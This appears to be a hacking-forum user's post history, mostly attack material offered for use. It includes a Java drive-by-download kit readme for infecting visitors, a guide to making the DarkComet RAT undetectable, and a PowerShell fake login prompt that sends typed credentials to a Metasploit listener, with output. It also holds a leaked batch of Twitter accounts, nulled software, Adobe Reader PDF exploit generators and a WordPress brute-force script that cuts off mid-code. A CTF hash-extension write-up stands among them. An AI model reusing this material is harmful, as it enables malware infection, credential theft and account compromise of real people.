Fi8sVrs
Active Members
Posts: 3206
Days Won: 87

Everything posted by Fi8sVrs

  1. Size: 32,04 MB Speedtest.net Clone - The Global Broadband Speed Test Script The ultimate fully customizable Speed Test application for your website. Easy to install and ready in a few minutes. Measures bandwidth up to Gb/s. Test statistics database, advanced VoIP test and much more are available. Demo Download speedtest.net.rar (32,04 MB) - uploaded.net Source: nulled
  2. This video demonstrates how to make a darkcomet rat undetectable. P.S. these are the names of tools needed for it to work: [C#] Source Code Generator V4.0 Final DeepSea Obfuscator.v4.0.1.16.full DNGuard HVM.Enterprise 3.60 cracked-SND DarkComet Version 5.3.1 Microsoft visual studio
  3. Readme: Step 1.) Open game.java and change fileLink to a link to a ZIPPED file that you want to download and execute to the remote pc.. Step 2.) whilst still in game.java change fileDir to the directory of the computer where you want to download your application to. Step 3.) Find out what JDK version you have and edit the three .bat files to correspond to your JDK version - Example: "C:\Program Files\Java\jdk1.6.0_16\bin\javac.exe" -cp . *.java This shows my version of JDK is 1.6.0_16 if you go to 'C:\Program Files\Java\' and see what version of jdk you had e.g. 1.6.0_21 you would change the three files so that it was like so: "C:\Program Files\Java\jdk1.6.0_21\bin\javac.exe" Step 4.) Run Compile.bat if no errors show then proceed to step 5. Step 5.) Run Make JAR-FILE.bat Step 6.) Run 'SIGN YOUR JAR.bat' and when prompted enter the password 'java123' it will not show your typing but it will be there after typing 'java123' hit enter. Step 7.) Upload yourfile.zip, Client.html, and Client.jar to a webhost, and then send people to http://yourlink.com/Client.html to execute the Drive By Download on them. Download
  4. As many of you know, last weekend was Ghost in the Shellcode 2015! There were plenty of fun challenges, and as always I had a great time competing! This will be my first of four writeups, and will be pretty simple (since it simply required me to use a tool that already exists (and that I wrote)

The level was called "knockers". It's a simple python script that listens on an IPv6 UDP port and, if it gets an appropriately signed request, opens one or more other ports. The specific challenge gave you a signed token to open port 80, and challenged you to open up port 7175. The service itself listened on port 8008 ("BOOB", to go with the "knockers" name).

You can download the original level here (Python).

    # python2 please
    import sys
    import struct
    import hashlib
    import os
    from binascii import hexlify, unhexlify
    import SocketServer
    import socket

    try:
        from fw import allow
    except ImportError:
        def allow(ip,port):
            print 'allowing host ' + ip + ' on port ' + str(port)

    PORT = 8008
    g_h = hashlib.sha512
    g_key = None

    def generate_token(h, k, *pl):
        m = struct.pack('!'+'H'*len(pl), *pl)
        mac = h(k+m).digest()
        return mac + m

    def parse_and_verify(h, k, m):
        ds = h().digest_size
        if len(m) < ds:
            return None
        mac = m[:ds]
        msg = m[ds:]
        if h(k+msg).digest() != mac:
            return None
        port_list = []
        for i in range(0,len(msg),2):
            if i+1 >= len(msg):
                break
            port_list.append(struct.unpack_from('!H', msg, i)[0])
        return port_list

    class KnockersRequestHandler(SocketServer.BaseRequestHandler):
        def handle(self):
            global g_key
            data, s = self.request
            print 'Client: {} len {}'.format(self.client_address[0],len(data))
            l = parse_and_verify(g_h, g_key, data)
            if l is None:
                print 'bad message'
            else:
                for p in l:
                    allow(self.client_address[0], p)

    class KnockersServer(SocketServer.UDPServer):
        address_family = socket.AF_INET6

    def load_key():
        global g_key
        f=open('secret.txt','rb')
        g_key = unhexlify(f.read())
        f.close()

    def main():
        global g_h
        global g_key
        g_h = hashlib.sha512
        if len(sys.argv) < 2:
            print '''Usage:
    --- Server ---
    knockers.py setup
        Generates a new secret.txt
    knockers.py newtoken port [port [port ...]]
        Generates a client token for the given ports
    knockers.py serve
        Runs the service
    --- Client ---
    knockers.py knock <host> <token>
        Tells the server to unlock ports allowed by the given token
    '''
        elif sys.argv[1]=='serve':
            load_key()
            server = KnockersServer(('', PORT), KnockersRequestHandler)
            server.serve_forever();
        elif sys.argv[1]=='setup':
            f = open('secret.txt','wb')
            f.write(hexlify(os.urandom(16)))
            f.close()
            print 'wrote new secret.txt'
        elif sys.argv[1]=='newtoken':
            load_key()
            ports = map(int,sys.argv[2:])
            print hexlify(generate_token(g_h, g_key, *ports))
        elif sys.argv[1]=='knock':
            ai = socket.getaddrinfo(sys.argv[2],PORT,socket.AF_INET6,socket.SOCK_DGRAM)
            if len(ai) < 1:
                print 'could not find address: ' + sys.argv[2]
                return
            family, socktype, proto, canonname, sockaddr = ai[0]
            s = socket.socket(family, socktype, proto)
            s.sendto(unhexlify(sys.argv[3]), sockaddr)
        else:
            print 'unrecognized command'

    if __name__ == '__main__':
        main()

The vulnerability

To track down the vulnerability, let's have a look at the signature algorithm:

    def generate_token(h, k, *pl):
        m = struct.pack('!'+'H'*len(pl), *pl)
        mac = h(k+m).digest()
        return mac + m

In that function, h is a hash function (sha-512, specifically), k is a random 16-byte token, randomly generated, and m is an array of 16-bit representation of the ports that the user wishes to open. So if the user wanted to open port 1 and 2, they'd send "\x00\x01\x00\x02", along with the appropriate token (which the server administrator would have to create/send, see below).

Hmm... it's generating a mac-protected token and string by concatenating strings and hashing them? If you've followed my blog, this might sound very familiar! This is a pure hash extension vulnerability!

I'm not going to re-iterate what a hash extension vulnerability is in great detail—if you're interested, check out the blog I just linked—but the general idea is that if you generate a message in the form of msg + H(secret + msg), the user can arbitrarily extend the message and generate a new signature! That means if we have access to any port, we have access to every port! Let's see how!

Generating a legit token

To use the python script linked above, first run 'setup':

    $ python ./knockers.py setup
    wrote new secret.txt

Which generates a new secret. The secret is just a 16-byte random string that's stored on the server. We don't really need to know what the secret is, but for the curious, if you want to follow along and verify your numbers against mine, it's:

    $ cat secret.txt
    2b396fb91a76307ce31ef7236e7fd3df

Now we use the tool (on the same host as the secret.txt file) to generate a token that allows access on port 80:

    $ python ./knockers.py newtoken 80
    83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb20050

Notice the first 512 bits (64 bytes) is the signature—which is logical, since it's sha512—and the last 16 bits (2 bytes) are 0050, which is the hex representation of 80. We'll split those apart later, when we run hash_extender, but for now let's make sure the token actually works first!

We start the server:

    $ python ./knockers.py serve

And in another window, or on another host if you prefer, send the generated token:

    $ python ./knockers.py knock localhost 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb20050

In the original window, you'll see that it was successful:

    $ python ./knockers.py serve
    Client: ::1 len 66
    allowing host ::1 on port 80

Now, let's figure out how to create a token for port 7175!

Generating an illegit (non-legit?) token

So this is actually the easiest part. It turns out that the awesome guy who wrote hash_extender (just kidding, he's not awesome) built in everything you needed for this attack!

Download and compile hash_extender if needed (definitely works on Linux, but I haven't tested on any other platforms—testers are welcome!), and run it with no arguments to get the help dump.

You need to pass in the original data (that's "\x00\x80"), the data you want to append (7175 => "\x1c\x07"), the original signature, and the length of the secret (which is 16 bytes). You also need to pass in the types for each of the parameters ("hex") in case the defaults don't match (in this case, they don't—the appended data is assumed to be raw).

All said and done, here's the command:

    ./hash_extender --data-format hex --data 0050 \
      --signature-format hex --signature 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2 \
      --append "1c07" --append-format hex \
      -l 16

You can pass in the algorithm and the desired output format as well, if we don't, it'll just output in every 512-bit-sized hash type. The output defaults to hex, so we're happy with that.

    $ ./hash_extender --data-format hex --data 0050 --signature-format hex --signature 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2 --append "1c07" --append-format hex -l 16
    Type: sha512
    Secret length: 16
    New signature: 4bda887c0fc43636f39ff38be6d592c2830723197b93174b04d0115d28f0d5e4df650f7c48d64f7ca26ef94c3387f0ca3bf606184c4524600557c7de36f1d894
    New string: 005080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07

    Type: whirlpool
    Secret length: 16
    New signature: f4440caa0da933ed497b3af8088cb78c49374853773435321c7f03730386513912fb7b165121c9d5fb0cb2b8a5958176c4abec35034c2041315bf064de26a659
    New string: 0050800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07

Ignoring the whirlpool token, since that's the wrong algorithm, we now have a new signature and a new string. We can just concatenate them together and use the built-in client to use them:

    $ python ./knockers.py knock localhost 4bda887c0fc43636f39ff38be6d592c2830723197b93174b04d0115d28f0d5e4df650f7c48d64f7ca26ef94c3387f0ca3bf606184c4524600557c7de36f1d894005080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07

And checking our server, we see a ton of output, including successfully opening port 7175:

    $ python ./knockers.py serve
    Client: ::1 len 66
    allowing host ::1 on port 80
    Client: ::1 len 178
    allowing host ::1 on port 80
    allowing host ::1 on port 32768
    allowing host ::1 on port 0
    allowing host ::1 on port 0
    [...repeated like 100 times...]
    allowing host ::1 on port 0
    allowing host ::1 on port 0
    allowing host ::1 on port 144
    allowing host ::1 on port 7175

And that's it! At that point, you can visit http://knockers.2015.ghostintheshellcode.com:7175 and get the key.

Source: skullsecurity
  5. Metasploit Minute has entered into its 3rd “season”. And we kick it off with using the Metasploit capture modules to capture creds from this powershell popup. The cool thing about this is you can leave it to execute on a system without any other code on disk and get creds constantly as any level of user. No admin, no UAC bypass needed. Just a bunch of creds for free.. over SSL. ;–)

Here is the video:

Here is the code:

    $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);
    [system.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
    $wc = new-object net.webclient;
    $wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
    $wc.Proxy = [system.Net.WebRequest]::DefaultWebProxy;
    $wc.Proxy.Credentials = [system.Net.CredentialCache]::DefaultNetworkCredentials;
    $wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
    $result = $wc.downloadstring('https://172.16.102.163');

Let's break down the code line by line:

    $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserName,[Environment]::UserDomainName);

This tells windows to prompt for credentials, with the title of “Failed Authentication”, no info in the comment (so it uses default), and include the username and domain in the box to add authenticity. That's where all the magic is, everything else is just gravy.

    [system.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};

Tells powershell not to verify SSL certificates (allows us to use self signed certs in the HTTPS transaction later).

    $wc = new-object net.webclient;
    $wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");

Creates a new webclient object and sets its user agent to ‘wget’.

    $wc.Proxy = [system.Net.WebRequest]::DefaultWebProxy;
    $wc.Proxy.Credentials = [system.Net.CredentialCache]::DefaultNetworkCredentials;

Tells powershell to use whatever proxy the current user uses with whatever credentials they have cached. If one or both are unnecessary it just ignores these settings.

    $wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');

Tells powershell that the HTTP-Basic credentials to use are the ones typed in the popup box recently by the user.

    $result = $wc.downloadstring('https://172.16.102.163');

And finally the request to the HTTP-Basic capture module in metasploit, but you could have anything you want capture these creds.

    cat power.txt | iconv --to-code UTF-16LE | [...]

Then execute powershell -ep bypass -enc <the encoded text from above> and you get this:

    root@wpad:~/metasploit-framework# ./msfconsole -Lq
    msf > use auxiliary/server/capture/http_basic
    msf auxiliary(http_basic) > show options

    Module options (auxiliary/server/capture/http_basic):

       Name         Current Setting  Required  Description
       ----         ---------------  --------  -----------
       REALM        Secure Site      yes       The authentication realm you'd like to present.
       RedirectURL                   no        The page to redirect users to after they enter basic auth creds
       SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT      80               yes       The local port to listen on.
       SSL          false            no        Negotiate SSL for incoming connections
       SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
       SSLVersion   SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
       URIPATH                       no        The URI to use for this exploit (default is random)

    msf auxiliary(http_basic) > set SSL true
    SSL => true
    msf auxiliary(http_basic) > set SRVPORT 443
    SRVPORT => 443
    msf auxiliary(http_basic) > set URIPATH /
    URIPATH => /
    msf auxiliary(http_basic) > run
    [*] Auxiliary module execution completed
    msf auxiliary(http_basic) >
    [*] Listening on 0.0.0.0:443...
    [*] Using URL: https://0.0.0.0:443/
    [*] Local IP: https://172.16.102.163:443/
    [*] Server started.
    [*] 172.16.102.140 http_basic - Sending 401 to client 172.16.102.140
    [+] 172.16.102.140 - Credential collected: "SITTINGDUCK\user:ASDqwe123" => /

Source: room362
  6. Approx. 2.5k Twitter accounts worldwide.
Download: OrhDWPZlVi3zO92C05IBLr3l4GfD3q1sdDMs
rc4 key: https://rstforums.com/forum/100971-conturi-twitter.rst
  7. This archive contains 174 exploits that were added to Packet Storm in April, 2015. 1504-exploits/ 1504-exploits/wpwoocommerceaa-shelldisclose.txt 1504-exploits/emailmarkerter-xss.txt 1504-exploits/projectsend561-xsrf.txt 1504-exploits/nodesstudio-sqlxssdiscose.txt 1504-exploits/wpsam-disclose.txt 1504-exploits/VL-1314.txt 1504-exploits/VL-1227.txt 1504-exploits/airties-exec.txt 1504-exploits/oracledotcom-xss.txt 1504-exploits/prolink-xsrf.txt 1504-exploits/PRL-2015-05.tgz 1504-exploits/wpphpec-upload.txt 1504-exploits/AS-WFTP0328.txt 1504-exploits/hippocms-crlf.txt 1504-exploits/bloofoxcms050-xss.txt 1504-exploits/wpbusinessintelligence-sql.txt 1504-exploits/wpthecartpress-xsslfi.txt 1504-exploits/netgearwnr2000v4-xssexec.txt 1504-exploits/SpiritSploit.py.txt 1504-exploits/ms15-034.txt 1504-exploits/mediasuitecms-disclose.txt 1504-exploits/proftpd135-filecopy.txt 1504-exploits/6kbbs80-xss.txt 1504-exploits/cve-2014-7822_poc.c 1504-exploits/proftpd135-exec.txt 1504-exploits/wpallinone-sql.txt 1504-exploits/multi_ncc_ping_exec.rb.txt 1504-exploits/phplist3010-insecure.txt 1504-exploits/6kbbs-sql.txt 1504-exploits/0xb16b00b5.tgz 1504-exploits/adbbackup-traversal.txt 1504-exploits/netcatcms-traversal.txt 1504-exploits/wp42-xss.txt 1504-exploits/fedoraabrt-racecondition.txt 1504-exploits/oraclehyperionsmart-dos.txt 1504-exploits/VL-1311.txt 1504-exploits/wpfusionengage-disclose.txt 1504-exploits/VL-1322.txt 1504-exploits/wpnexforms-sql.txt 1504-exploits/landesk-rfixsrf.txt 1504-exploits/VL-1445.txt 1504-exploits/wp_wpshop_ecommerce_file_upload.rb.txt 1504-exploits/wp_inboundio_marketing_file_upload.rb.txt 1504-exploits/honeywell-traversal.txt 1504-exploits/VL-1455.txt 1504-exploits/adobe_flash_casi32_int_overflow.rb.txt 1504-exploits/proverbswebcal212-xss.txt 1504-exploits/wtknetwork-sql.txt 1504-exploits/kemploadmaster-execxsrfxssdos.txt 1504-exploits/wpduplicator-sqlxsrf.txt 1504-exploits/VL-1215.txt 1504-exploits/wp_worktheflow_upload.rb.txt 
1504-exploits/rootpipe.rb.txt 1504-exploits/6kbbs80-xsrf.txt 1504-exploits/fmp3cr2628-overflow.txt 1504-exploits/wpyoastgs-xss.txt 1504-exploits/ninja-racecondition.txt 1504-exploits/opointmedia-openredirect.txt 1504-exploits/wp_nmediawebsite_file_upload.rb.txt 1504-exploits/texttospeech-xss.txt 1504-exploits/wpnexforms3-sql.txt 1504-exploits/nasagov-xss.txt 1504-exploits/sambaopenldap-xss.txt 1504-exploits/wpcontentslide-xssxsrf.txt 1504-exploits/wpsam-upload.txt 1504-exploits/freepbx-xss.txt 1504-exploits/pligg202-xss.txt 1504-exploits/ZSL-2015-5240.txt 1504-exploits/netcatcms-inject.txt 1504-exploits/phpsfp-sql.txt 1504-exploits/ZSL-2015-5238.txt 1504-exploits/wptunelibrary154-sql.txt 1504-exploits/testdisk-overflow.txt 1504-exploits/websid-xss.txt 1504-exploits/wpshareaholic-xss.txt 1504-exploits/cpx_proftp.py.txt 1504-exploits/huaweiseqanalyst-xss.txt 1504-exploits/jaws111-xsrf.txt 1504-exploits/wpmon-disclose.txt 1504-exploits/untangle-xssdisclose.txt 1504-exploits/samsungipolis-exec.txt 1504-exploits/orangehrm321411-sqlxss.txt 1504-exploits/jboss_seam_upload_exec.rb.txt 1504-exploits/netsol_web_mail.pdf 1504-exploits/SA-20150409-0.txt 1504-exploits/VL-1444.txt 1504-exploits/edruttmsdpim-traversalfile.txt 1504-exploits/zenworks-exectraversal.txt 1504-exploits/hotexbilling-xss.txt 1504-exploits/osxrootpipe-escalate.txt 1504-exploits/miniupnpd-overflow.txt 1504-exploits/wprevolutionslider-shell.txt 1504-exploits/ossolution-sql.txt 1504-exploits/VL-1228.txt 1504-exploits/wpdesignfolio-shell.txt 1504-exploits/wpcommunityevents135-sql.txt 1504-exploits/thehunter.txt 1504-exploits/CORE-2015-0008.txt 1504-exploits/solarwinds_fsm_userlogin.rb.txt 1504-exploits/phptraffica23-xss.txt 1504-exploits/pimcorecms305-xsrf.txt 1504-exploits/wolfcms082-shell.txt 1504-exploits/otrs31x-xss.txt 1504-exploits/php-typeconfusion.txt 1504-exploits/avsarsoftmatbaa-shellxss.txt 1504-exploits/wooframework451-xss.txt 1504-exploits/joomlasimplephotogallery-shell.txt 
1504-exploits/ubuntuusbcreator-escalate.txt 1504-exploits/wp_creativecontactform_file_upload.rb.txt 1504-exploits/weebly-hijack.txt 1504-exploits/wpultimatenewspaper-xss.txt 1504-exploits/wpvvci-shell.txt 1504-exploits/PRL-2015-04.tgz 1504-exploits/idm6-dllhijack.txt 1504-exploits/Mac-OS-X_Fat-DoS.c 1504-exploits/openletters-inject.txt 1504-exploits/encapsflashgallery-dos.txt 1504-exploits/VL-1438.txt 1504-exploits/adobe_flash_copy_pixels_to_byte_array.rb.txt 1504-exploits/flatpress10-xss.txt 1504-exploits/SA-20150410-0.txt 1504-exploits/synology-xss.txt 1504-exploits/VL-1453.txt 1504-exploits/wp_slideshowgallery_upload.rb.txt 1504-exploits/edruttmsdprv-xss.txt 1504-exploits/edruttmsdp-redirect.txt 1504-exploits/VL-1474.txt 1504-exploits/wpsam-sql.txt 1504-exploits/ZSL-2015-5242.txt 1504-exploits/VL-1452.txt 1504-exploits/javacom-xss.txt 1504-exploits/barracuda_5x_reports_postauth_root_exploit.rb.txt 1504-exploits/safari-crossdomain.txt 1504-exploits/SGMA15-002.txt 1504-exploits/VL-1359.txt 1504-exploits/comsenzsupesitecms70-xss.txt 1504-exploits/eceprojects-xss.txt 1504-exploits/apachespark-exec.txt 1504-exploits/ceragon_fibeair_known_privkey.rb.txt 1504-exploits/wpcitizenspace-xss.txt 1504-exploits/VL-1447.txt 1504-exploits/edruttmsdp-xss.txt 1504-exploits/ceragonfibeair-disclose.txt 1504-exploits/zyxel-dos.txt 1504-exploits/huaweiseqanalyst-xxe.txt 1504-exploits/wpqaengine-escalate.txt 1504-exploits/apportabrt-exec.txt 1504-exploits/qlik-redirect.txt 1504-exploits/wpvideogallery28-sql.txt 1504-exploits/pyscripter-dllhijack.txt 1504-exploits/bluedragon-traversal.txt 1504-exploits/meela-xss.txt 1504-exploits/unipdf12-overflow.txt 1504-exploits/wpworktheflow252-shell.txt 1504-exploits/VL-1446.txt 1504-exploits/soapfault-typeconfusion.txt 1504-exploits/wpnmediawcf-shell.txt 1504-exploits/mefa-xss.txt 1504-exploits/goautodial-execsqlupload.txt 1504-exploits/ZSL-2015-5239.txt 1504-exploits/ZSL-2015-5241.txt 1504-exploits/wpseopack180-shell.txt 
1504-exploits/wpstatistics912-xss.txt 1504-exploits/wpvvp-shell.txt 1504-exploits/xoops2571-xss.txt 1504-exploits/androidbackupagent-exec.txt 1504-exploits/apportabrt-issues.txt 1504-exploits/freebsdkey-disclose.txt 1504-exploits/legend_rce.py.txt 1504-exploits/wpwdippu-upload.txt 1504-exploits/wp_reflexgallery_file_upload.rb.txt 1504-exploits/libarchive-dos.tgz 1504-exploits/log2space62-xss.txt 1504-exploits/wpajaxstorelocator-sql.txt tar: 1504-exploits/wpajaxstorelocator-sql.txt: time stamp 2015-05-16 05:33:33 is 1279061.268089756 s in the future Download
  8. Here are Adobe Reader exploits for CVE-2011-2462 and two different versions of CVE-2010-2883; all of the code is Python.

Usage for cve2011-4262: createExploitPDF.py http://example.com/bin/bad.exe
Usage for CVE-2010-2883: [input_file.exe] [output_file.pdf]

adobe.rar — RGhost — file sharing

List of files:

    File name                  Size     Compressed  Ratio
    adobe/createExploitPDF.py  32.2 KB  5.93 KB     18.425%
    adobe/PDF2883v2.py         414 KB   128 KB      30.835%
    adobe/PDF2883v3.py         665 KB   202 KB      30.306%
    adobe

Source: opensc
  9. Dropbox launches bug hunter bounty programme from $216 a flaw
  10. This is a python script that performs brute forcing against WordPress installs using a wordlist. WordPress Brute Force by Claudio Viviani Inspired by xSecurity's WordPress Brute Muliththreading Tested on Wordpress 3.x and 4.x Disclaimer: This tool is intended for educational purposes only and the author can not be held liable for any kind of damages done whatsoever to your machine, or damages caused by some other,creative application of this exploit. In any case you disagree with the above statement,stop here. Requirements: python's httplib2 lib Installation: pip install httplib2 Features: Multithreading xml-rpc brute force mode http and https protocols support Random User Agent CHANGELOG: 2015-04-12 v2.0 Add new feature xml-rpc brute force mode Fix minor bugs 2015-04-11 v1.1 optparse (Deprecated since version 2.7) replaced by argparse Fix connection bugs Download: #!/usr/bin/env python# # WordPress Brute Force by Claudio Viviani # # Inspired by xSecurity's WordPress Brute Muliththreading # # Tested on Wordpress 3.x and 4.x # # Disclaimer: # # This tool is intended for educational purposes only and the author # can not be held liable for any kind of damages done whatsoever to your machine, # or damages caused by some other,creative application of this exploit. # In any case you disagree with the above statement,stop here. # # Requirements: # # 1) python's httplib2 lib # Installation: pip install httplib2 # # Features: # # 1) Multithreading # 2) xml-rpc brute force mode # 3) http and https protocols support # 4) Random User Agent # # CHANGELOG: # # 2015-04-12 v2.0 # 1) Add new feature xml-rpc brute force mode # 2) Fix minor bugs # # 2015-04-11 v1.1 # 1) optparse (Deprecated since version 2.7) replaced by argparse # 2) Fix connection bugs # # import urllib, httplib, httplib2 import socket, sys, os, os.path, argparse, random from threading import Thread from time import sleep banner = """ ___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. 
| | _ | _| _ | _ | _| -__|__ --|__ --| |. / \ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | `--- ---' _______ __ _______ | _ .----.--.--| |_.-----| _ .-----.----.----.-----. |. 1 | _| | | _| -__|. 1___| _ | _| __| -__| |. _ |__| |_____|____|_____|. __) |_____|__| |____|_____| |: 1 \ |: | |::.. . / |::.| `-------' `---' W0rdBRUTEpr3ss v2.0 Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch http://ffhd.homelab.it (Free Fuzzy Hashes Database) https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """ def randomAgentGen(): userAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 
Safari/537.76.4', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4', 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 